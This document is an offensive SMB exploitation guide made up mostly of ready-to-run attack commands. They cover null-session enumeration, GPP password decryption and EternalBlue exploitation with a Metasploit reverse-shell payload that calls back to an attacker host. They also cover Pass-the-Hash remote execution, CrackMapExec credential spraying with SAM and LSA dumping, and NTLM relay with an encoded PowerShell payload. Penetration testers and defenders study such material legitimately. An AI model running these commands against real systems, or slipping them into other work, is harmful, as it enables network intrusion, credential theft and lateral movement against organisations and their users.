SMB Exploitation Guide: EternalBlue, Pass-the-Hash, and Null Sessions

Server Message Block (SMB) is one of the most attacked protocols in enterprise networks. From the catastrophic EternalBlue exploit to everyday Pass-the-Hash lateral movement, SMB weaknesses have enabled some of the most impactful breaches in history. This guide covers the complete SMB attack surface.

SMB Protocol Basics

SMB runs on TCP port 445 (and legacy NetBIOS on 139). Key versions to understand:

• SMBv1 — Legacy, insecure, enabled by default on Windows 7/2008. Source of EternalBlue. Should be disabled everywhere.
• SMBv2/v3 — Modern, encrypted (SMBv3.1.1+), still vulnerable to relay attacks if signing is disabled.

Quick fingerprint with nmap:

nmap -p 139,445 --script smb-security-mode,smb2-security-mode,smb-vuln-ms17-010 192.168.1.0/24

Null Session Enumeration

Null sessions allow unauthenticated SMB connections that can enumerate users, groups, shares, and policies. Common on older Windows and misconfigured Samba.

# enum4linux — comprehensive null session enumeration
enum4linux -a 192.168.1.10

# Enumerate shares only
enum4linux -S 192.168.1.10

# smbclient — connect anonymously and list shares
smbclient -L //192.168.1.10 -N

# Connect to a specific share
smbclient //192.168.1.10/SYSVOL -N

# CrackMapExec null session
crackmapexec smb 192.168.1.10 -u '' -p '' --shares
crackmapexec smb 192.168.1.10 -u '' -p '' --users

Always check SYSVOL and NETLOGON for Group Policy Preferences (GPP) XML files — they may contain cpassword fields encrypted with a publicly known AES key.

# Decrypt GPP password (gpp-decrypt tool)
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ7zWmVHDittvgCQCJGS5xo=

EternalBlue (MS17-010) Detection and Exploitation

EternalBlue is a critical SMBv1 vulnerability (CVE-2017-0144) weaponised by the NSA's ETERNALBLUE exploit, leaked by Shadow Brokers, and used in WannaCry and NotPetya. Unpatched Windows XP, 7, 2003, and 2008 systems are vulnerable.

# Detect with nmap NSE script
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10

# Metasploit exploitation
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 10.10.10.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

# Non-metasploit: PoC scanner
python3 checker.py 192.168.1.10

Always verify vulnerability before exploitation in production-adjacent environments. EternalBlue can crash unpatched servers.

Pass-the-Hash via SMB

With a valid NTLM hash (from Mimikatz, secretsdump, or responder captures), you can authenticate to remote systems without the plaintext password.

# psexec — creates a service, spawns SYSTEM shell
psexec.py -hashes :NTLMHASH CORP/[email protected]

# smbexec — executes commands via SMB, no binary dropped
smbexec.py -hashes :NTLMHASH CORP/[email protected]

# wmiexec — WMI execution, quieter than psexec
wmiexec.py -hashes :NTLMHASH CORP/[email protected] "whoami"

# Mount a share with PTH (useful for file access)
smbclient //192.168.1.20/C$ -U 'CORP/Administrator%aad3b435b51404eeaad3b435b51404ee:NTLMHASH'

CrackMapExec for Enumeration and Lateral Movement

CrackMapExec (CME) / NetExec is the Swiss Army knife of SMB lateral movement. It scales attacks across entire subnets.

# Credential spray across subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -p 'Password123'

# Spray NTLM hashes
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH

# Dump SAM database on successful auth
crackmapexec smb 192.168.1.20 -u Administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.20 -u Administrator -p 'Password123' --lsa

# Execute command
crackmapexec smb 192.168.1.20 -u Administrator -p 'Password123' -x "ipconfig /all"

# Enumerate logged-on users
crackmapexec smb 192.168.1.0/24 -u Administrator -p 'Password123' --loggedon-users

# Spider shares for sensitive files
crackmapexec smb 192.168.1.20 -u lowpriv -p 'Pass123' -M spider_plus

SMB Relay Attacks

When SMB signing is disabled (common on workstations), you can relay captured NTLM authentication to other systems — no cracking required. Responder captures the hash; ntlmrelayx relays it in real time.

# Step 1: Check which hosts have SMB signing disabled
crackmapexec smb 192.168.1.0/24 --gen-relay-list unsigned_hosts.txt
# Or: nmap --script smb2-security-mode

# Step 2: Start Responder (disable SMB and HTTP so ntlmrelayx can bind)
# Edit /etc/responder/Responder.conf: SMB = Off, HTTP = Off
responder -I eth0 -rdw

# Step 3: Start ntlmrelayx targeting unsigned hosts
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support

# Relay to specific target with command execution
ntlmrelayx.py -t 192.168.1.30 -smb2support -c "powershell -enc BASE64PAYLOAD"

# Relay and dump SAM automatically
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support --sam

Trigger authentication by poisoning LLMNR/NBT-NS (Responder does this automatically) or by coercing authentication via PrinterBug / PetitPotam.

Anonymous Share Enumeration

# List all open shares across a range
crackmapexec smb 192.168.1.0/24 -u '' -p '' --shares 2>/dev/null | grep READ

# Recursive listing of readable share
smbmap -H 192.168.1.10 -R

# Authenticated share mapping
smbmap -H 192.168.1.10 -u lowpriv -p 'Password123' -R --depth 5

# Download entire readable share
smbclient //192.168.1.10/Files -N -c 'recurse; prompt; mget *'

Combine SMB enumeration with Network Recon Tool for a full picture of the attack surface. For post-exploitation lateral movement commands, see our Lateral Movement Techniques guide. If you compromise AD credentials via SMB relay, the Active Directory Generator will help you build the next-stage payloads.